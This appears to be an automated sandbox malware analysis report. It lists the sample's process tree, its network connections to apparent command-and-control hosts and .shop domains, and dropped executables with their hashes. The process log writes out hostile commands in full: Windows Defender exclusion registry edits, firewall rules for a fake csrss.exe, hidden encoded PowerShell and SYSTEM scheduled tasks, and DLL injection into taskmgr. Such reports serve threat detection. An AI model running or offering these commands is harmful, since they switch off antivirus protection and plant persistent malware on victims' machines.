"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gMvUkTVLF" /SC once /ST 01:37:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gMvUkTVLF"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gMvUkTVLF"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 10:59:43 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\gMqqyxU.exe\" XT /Pisite_idaaw 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\gMqqyxU.exe
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\gMqqyxU.exe XT /Pisite_idaaw 385118 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\wsSuZb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\nANKiDo.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qbSDwEgyNYPZlGA"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\fTFbbQv.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\QPIRdrq.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\lrMXAbH.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\hHLlPFm.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 10:37:19 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\xSrBBRNN\fNyRhtE.dll\",#1 /LKsite_idgQI 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "QhciBzJOokLnyYZub"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\xSrBBRNN\fNyRhtE.dll",#1 /LKsite_idgQI 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\xSrBBRNN\fNyRhtE.dll",#1 /LKsite_idgQI 385118
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
| Country | Destination | Domain | Proto |
| RU | 193.233.132.139:80 | 193.233.132.139 | tcp |
| RU | 193.233.132.167:80 | 193.233.132.167 | tcp |
| US | 8.8.8.8:53 | 167.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 216.58.212.238:443 | www.youtube.com | tcp |
| GB | 216.58.212.238:443 | www.youtube.com | tcp |
| NL | 173.194.69.84:443 | udp | |
| GB | 142.250.200.14:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.200.14:443 | clients2.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.187.238:443 | www.youtube.com | tcp |
| GB | 142.250.187.238:443 | www.youtube.com | udp |
| RU | 193.233.132.167:80 | 193.233.132.167 | tcp |
| US | 104.21.67.211:443 | affordcharmcropwo.shop | tcp |
| US | 104.21.72.132:443 | cleartotalfisherwo.shop | tcp |
| US | 172.67.199.191:443 | worryfillvolcawoi.shop | tcp |
| US | 104.21.18.233:443 | enthusiasimtitleow.shop | tcp |
| US | 104.21.22.160:443 | dismissalcylinderhostw.shop | tcp |
| US | 188.114.96.2:443 | jonathantwo.com | tcp |
| US | 104.21.83.19:443 | communicationgenerwo.shop | tcp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 104.21.11.250:443 | productivelookewr.shop | tcp |
| US | 188.114.97.2:443 | jonathantwo.com | tcp |
| DE | 185.172.128.33:8970 | tcp | |
| US | 172.67.147.41:443 | tolerateilusidjukl.shop | tcp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 172.67.169.43:443 | shatterbreathepsw.shop | tcp |
| US | 104.21.16.225:443 | shortsvelventysjo.shop | tcp |
| US | 172.67.218.63:443 | incredibleextedwj.shop | tcp |
| US | 172.67.157.23:443 | alcojoldwograpciw.shop | tcp |
| RU | 185.215.113.67:26260 | tcp | |
| US | 172.67.192.138:443 | liabilitynighstjsko.shop | tcp |
| US | 172.67.147.169:443 | demonstationfukewko.shop | tcp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| FR | 52.143.157.84:80 | 52.143.157.84 | tcp |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 77.221.151.47:80 | 77.221.151.47 | tcp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| RU | 193.233.132.175:80 | 193.233.132.175 | tcp |
| US | 172.67.188.178:443 | iplogger.com | tcp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| US | 172.67.193.79:443 | realdeepai.org | tcp |
| US | 172.67.193.79:443 | realdeepai.org | tcp |
| RU | 193.233.132.167:80 | 193.233.132.167 | tcp |
| NL | 185.26.182.112:80 | features.opera-api2.com | tcp |
| US | 188.114.96.2:443 | jonathantwo.com | tcp |
| US | 188.114.96.2:443 | jonathantwo.com | tcp |
| NL | 185.26.182.112:443 | features.opera-api2.com | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| RO | 176.97.76.106:80 | note.padd.cn.com | tcp |
| NL | 185.26.182.123:443 | autoupdate.geo.opera.com | tcp |
| NL | 185.26.182.123:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| RU | 193.233.132.167:80 | 193.233.132.167 | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| GB | 85.192.56.26:80 | 85.192.56.26 | tcp |
| DE | 185.172.128.76:80 | 185.172.128.76 | tcp |
| US | 172.67.188.178:443 | iplogger.com | tcp |
| NL | 185.26.182.93:443 | features.opera-api2.com | tcp |
| NL | 185.26.182.117:443 | download.opera.com | tcp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | 117.182.26.185.in-addr.arpa | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 2.16.106.156:443 | download3.operacdn.com | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| FR | 143.244.56.49:443 | download.iolo.net | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 104.18.10.89:443 | download5.operacdn.com | tcp |
| RU | 77.221.151.47:8080 | tcp | |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| RU | 91.215.85.66:15647 | tcp | |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| RU | 91.215.85.66:9000 | 91.215.85.66 | tcp |
| US | 3.80.150.121:443 | service-domain.xyz | tcp |
| GB | 142.250.200.14:443 | clients2.google.com | tcp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| GB | 142.250.200.14:443 | clients2.google.com | tcp |
| US | 44.239.141.158:80 | api.check-data.xyz | tcp |
| RU | 77.221.151.47:8080 | tcp |
Files
memory/3532-0-0x0000000000320000-0x00000000007DE000-memory.dmp
memory/3532-1-0x0000000077786000-0x0000000077788000-memory.dmp
memory/3532-3-0x0000000004F00000-0x0000000004F01000-memory.dmp
memory/3532-2-0x0000000004F10000-0x0000000004F11000-memory.dmp
memory/3532-5-0x0000000004EE0000-0x0000000004EE1000-memory.dmp
memory/3532-4-0x0000000004F40000-0x0000000004F41000-memory.dmp
memory/3532-6-0x0000000004EF0000-0x0000000004EF1000-memory.dmp
memory/3532-7-0x0000000004F70000-0x0000000004F71000-memory.dmp
memory/3532-8-0x0000000004F60000-0x0000000004F61000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
| MD5 | ea2314bc92bc85449967f3702b16b3f1 |
| SHA1 | 1b7b0006e65b9034617993710ea434f5a5f8a9d3 |
| SHA256 | 77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1 |
| SHA512 | f7964e45d1c6c1f280d277126a65c10dad131f761125f59bcfd305d4af73fc673bc5670685f4f5c7d8b4f9cf74be55eaef13eb95458bf93bc307a8bb6a1ad8db |
memory/3532-19-0x0000000000320000-0x00000000007DE000-memory.dmp
memory/2224-20-0x0000000000D70000-0x000000000122E000-memory.dmp
memory/2224-22-0x0000000004DD0000-0x0000000004DD1000-memory.dmp
memory/2224-23-0x0000000004DC0000-0x0000000004DC1000-memory.dmp
memory/2224-24-0x0000000004E00000-0x0000000004E01000-memory.dmp
memory/2224-26-0x0000000004DB0000-0x0000000004DB1000-memory.dmp
memory/2224-25-0x0000000004DA0000-0x0000000004DA1000-memory.dmp
memory/2224-27-0x0000000004DE0000-0x0000000004DE1000-memory.dmp
memory/2224-28-0x0000000004E30000-0x0000000004E31000-memory.dmp
memory/2224-29-0x0000000004E20000-0x0000000004E21000-memory.dmp
memory/4912-32-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-35-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-36-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-37-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-38-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-39-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-40-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-41-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-42-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-43-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-44-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-45-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-46-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-47-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-48-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-49-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-50-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-51-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-52-0x0000000000400000-0x00000000009CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe
| MD5 | d29e40c77247d5eea4c4029b804aa549 |
| SHA1 | 9031e95e7c03ebe7b7c1e828bf18325a76972168 |
| SHA256 | 0baee82ecdf7b62ca540857e4e3a46dfeda2e4c31352a4a064af7c40c154b9c2 |
| SHA512 | 3a50c63887f677aae90fb976b5c8677f913447cb6700eeb83bcc261e60d2d394f8876350b10e6c6b4e1906a7f05777eb6379346dbf0d618f1e3e35febbf5a4cf |
memory/4912-61-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-62-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-63-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-64-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-65-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-70-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-71-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-74-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/1740-76-0x0000000000CE0000-0x00000000011BE000-memory.dmp
memory/4912-77-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-78-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-79-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-80-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/4912-82-0x0000000005420000-0x0000000005421000-memory.dmp
memory/4912-83-0x00000000053F0000-0x00000000053F1000-memory.dmp
memory/2224-81-0x0000000000D70000-0x000000000122E000-memory.dmp
memory/2224-84-0x0000000000D70000-0x000000000122E000-memory.dmp
memory/4912-86-0x00000000053E0000-0x00000000053E1000-memory.dmp
memory/4912-85-0x0000000005450000-0x0000000005451000-memory.dmp
memory/4912-87-0x00000000053D0000-0x00000000053D1000-memory.dmp
memory/4912-89-0x0000000005460000-0x0000000005461000-memory.dmp
memory/4912-92-0x0000000005470000-0x0000000005471000-memory.dmp
memory/4912-91-0x0000000005410000-0x0000000005411000-memory.dmp
memory/4912-90-0x0000000005480000-0x0000000005481000-memory.dmp
memory/1740-95-0x0000000004DF0000-0x0000000004DF1000-memory.dmp
memory/1740-96-0x0000000004E30000-0x0000000004E31000-memory.dmp
memory/1740-94-0x0000000004E00000-0x0000000004E01000-memory.dmp
memory/1740-98-0x0000000004DE0000-0x0000000004DE1000-memory.dmp
memory/4912-99-0x00000000054A0000-0x00000000054A2000-memory.dmp
memory/1740-107-0x0000000000CE0000-0x00000000011BE000-memory.dmp
memory/1740-110-0x0000000004E50000-0x0000000004E51000-memory.dmp
C:\Users\Admin\1000013002\7617c78a76.exe
| MD5 | 3c0e9766b3871534c9ce1cb3c1bd6411 |
| SHA1 | 51c16a07072426188274a51ed54f9221451d3d07 |
| SHA256 | 7c813337ec7128442715e50e9206b28eeeeef151d1d9e2feb811813c44ff0cf3 |
| SHA512 | 43f315a302619547012defee1a136d9fe209fa4049fd6dc9ac88cfd4c8d721aa095062869c175219c4244dbf7d67854b15e5e0aab0c61aa2a2126f62c1f0bf98 |
memory/1740-123-0x0000000000CE0000-0x00000000011BE000-memory.dmp
memory/1740-97-0x0000000004DD0000-0x0000000004DD1000-memory.dmp
memory/4912-93-0x00000000053C0000-0x00000000053C1000-memory.dmp
memory/4912-88-0x0000000005430000-0x0000000005431000-memory.dmp
\??\pipe\crashpad_2692_GWUGPIQYIIBDWOQA
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Temp\1000014001\7d41195f4d.exe
| MD5 | c276e339570b6fd5baee1f245d5709fe |
| SHA1 | 26441e287b3afea93aa261fe67e462198f6dd6a5 |
| SHA256 | bb8ffe36beffbd984cff743f7091577798e5a58c7f6292bebc913bea7188a288 |
| SHA512 | aa22735eb01db36c14935640814c275dbde94602d13095fded0c36c19bb8ba2160b8fa63471cd131169554ea657cd6db8b7bf1b5fba19aeee8ab3412277ebf72 |
memory/1444-167-0x0000000000590000-0x0000000000B7B000-memory.dmp
memory/1444-177-0x00000000052A0000-0x00000000052A1000-memory.dmp
memory/1444-178-0x0000000005270000-0x0000000005271000-memory.dmp
memory/1444-179-0x0000000005260000-0x0000000005261000-memory.dmp
memory/1444-184-0x0000000005250000-0x0000000005251000-memory.dmp
memory/1444-185-0x00000000052B0000-0x00000000052B1000-memory.dmp
memory/1444-194-0x0000000005290000-0x0000000005291000-memory.dmp
memory/1444-198-0x0000000005240000-0x0000000005241000-memory.dmp
memory/1444-197-0x00000000052F0000-0x00000000052F1000-memory.dmp
memory/1444-189-0x0000000005300000-0x0000000005301000-memory.dmp
memory/1444-199-0x0000000005330000-0x0000000005332000-memory.dmp
memory/1444-187-0x00000000052E0000-0x00000000052E1000-memory.dmp
memory/1444-183-0x00000000052D0000-0x00000000052D1000-memory.dmp
memory/4912-202-0x0000000000400000-0x00000000009CA000-memory.dmp
memory/2224-210-0x0000000000D70000-0x000000000122E000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 5a1ea8d1b0282e55e79bff0a5c4464ce |
| SHA1 | 87d0b96fc4f76a34d9845f6dfc12307a97abc91a |
| SHA256 | 28aa626797a2748462a6ce8e6709aa1d6cff60366bb4062cec29e7d87ae3e3cc |
| SHA512 | 7332b5da41d72e61382d8cb7f3b27e05f550af61feb4a8af7f1d874b43dabbb4c6613e1a04e6f1803efff2c8484e4e09c3954efe179fa339bb0ae5cf1d68d72e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e6f9415bcdfad56ec41b7af6aac6542c |
| SHA1 | 7afe0c0cd0b074de9e22a0367a79aba55a870e77 |
| SHA256 | 2b0a3325412025751f03809e9dcfeb8625e271f9f728bf95906e1b12c1bc162d |
| SHA512 | 432f487c8ba76ff59ecbd4fa5d35a986ee12f6d0c8dbdf93b04f38e34cc1abb2cee017757b201142d600749f5adbff7e72f71ba3ba2ce46bcbb2eadea3d03b97 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 4509d426e55f1473d12c364a73529989 |
| SHA1 | be7c0c19f8902f0ff5d47a780e6c4150fb369c62 |
| SHA256 | 407c81dfe990ebf0d65d4d10b8ee3348c3aa46a4475907eb38aa2a1edd2a6a72 |
| SHA512 | 02ac02bb3491074559530ebd6e65f0183764dd0617121fb1a9f754d5ca235e7e87652ac380f8dde212fd50981cc246a5461ea41ab64706bc591a714babc7d334 |
memory/1444-226-0x0000000000590000-0x0000000000B7B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 0c44c03c790b4eb24610e1878cec99a0 |
| SHA1 | be8a34ef96fb3810e995799f20dc1b201d826099 |
| SHA256 | 1668b42dd771d0cfd2cd6a92052ede1e8004d736defcb1af94013dacbfbc5fdd |
| SHA512 | 5511a6b4a352fc607ec92d407b68a4d3f7c28315a7932b2004f6224ee72582367e4b097034d5b1daaa4b253489f39ee3b01a441dfc203380e306cfa63720aee7 |
memory/2224-236-0x0000000000D70000-0x000000000122E000-memory.dmp
memory/1444-237-0x0000000000590000-0x0000000000B7B000-memory.dmp
memory/1444-238-0x0000000000590000-0x0000000000B7B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 614a913bfd6f7dc33710847e6451b361 |
| SHA1 | c2cf5ad51bab1b788ab3d17a14c63fcf2a11ca3b |
| SHA256 | a387f4265db3e91bbf7720d2b103414fb87afb874010d01b71cba6f0a2a625c1 |
| SHA512 | 833c5caacd88b9c85696ee96348e41d7594c54f46aeaf4b1f5baf5c1bfae6bf68b2c063e779bd55e08e37bb091d3aa0d596e40740256cc681a2a1b777c03a94c |
memory/3188-246-0x0000000000BD0000-0x00000000010AE000-memory.dmp
memory/3188-247-0x0000000000BD0000-0x00000000010AE000-memory.dmp
memory/3188-254-0x0000000004E10000-0x0000000004E11000-memory.dmp
memory/3188-253-0x0000000004DC0000-0x0000000004DC1000-memory.dmp
memory/3188-252-0x0000000004DB0000-0x0000000004DB1000-memory.dmp
memory/3188-251-0x0000000004E20000-0x0000000004E21000-memory.dmp
memory/3188-250-0x0000000004DD0000-0x0000000004DD1000-memory.dmp
memory/3188-249-0x0000000004DF0000-0x0000000004DF1000-memory.dmp
memory/3188-248-0x0000000004DE0000-0x0000000004DE1000-memory.dmp
memory/1308-264-0x0000000000D70000-0x000000000122E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
| MD5 | 1c7d0f34bb1d85b5d2c01367cc8f62ef |
| SHA1 | 33aedadb5361f1646cffd68791d72ba5f1424114 |
| SHA256 | e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c |
| SHA512 | 53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d |
